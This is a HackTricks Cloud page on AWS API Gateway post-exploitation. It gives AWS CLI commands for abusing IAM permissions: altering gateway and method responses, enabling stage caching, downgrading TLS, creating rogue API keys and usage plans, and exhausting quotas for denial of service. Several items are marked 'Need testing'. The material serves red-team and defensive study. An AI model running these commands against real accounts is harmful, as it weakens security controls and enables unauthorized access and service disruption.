HackTricks Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - API Gateway Post Exploitation

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

API Gateway

For more information check:

pageAWS - API Gateway Enum

Access unexposed APIs

You can create an endpoint in https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint with the service com.amazonaws.us-east-1.execute-api, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections. Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.

Usage Plans DoS

In the Enumeration section you can see how to obtain the usage plan of the keys. If you have the key and it's limited to X usages per month, you could just use it and cause a DoS.

The API Key just need to be included inside a HTTP header called x-api-key.

apigateway:UpdateGatewayResponse, apigateway:CreateDeployment

An attacker with the permissions apigateway:UpdateGatewayResponse and apigateway:CreateDeployment can modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts.

API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"

# Update the Gateway Response
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.

Need testing

apigateway:UpdateStage, apigateway:CreateDeployment

An attacker with the permissions apigateway:UpdateStage and apigateway:CreateDeployment can modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data.

API_ID="your-api-id"
STAGE_NAME="Prod"

# Update the API Gateway stage
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Unauthorized access to cached data, disrupting or intercepting API traffic.

Need testing

apigateway:PutMethodResponse, apigateway:CreateDeployment

An attacker with the permissions apigateway:PutMethodResponse and apigateway:CreateDeployment can modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"

# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.

Need testing

apigateway:UpdateRestApi, apigateway:CreateDeployment

An attacker with the permissions apigateway:UpdateRestApi and apigateway:CreateDeployment can modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API.

API_ID="your-api-id"

# Update the REST API settings
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER'

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.

Need testing

apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey

An attacker with permissions apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, and apigateway:CreateUsagePlanKey can create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs.

# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')

# Create a new usage plan
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')

# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY

Potential Impact: Unauthorized access to API resources, bypassing security controls.

Need testing

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PreviousAWS - Post ExploitationNextAWS - CloudFront Post Exploitation

Last updated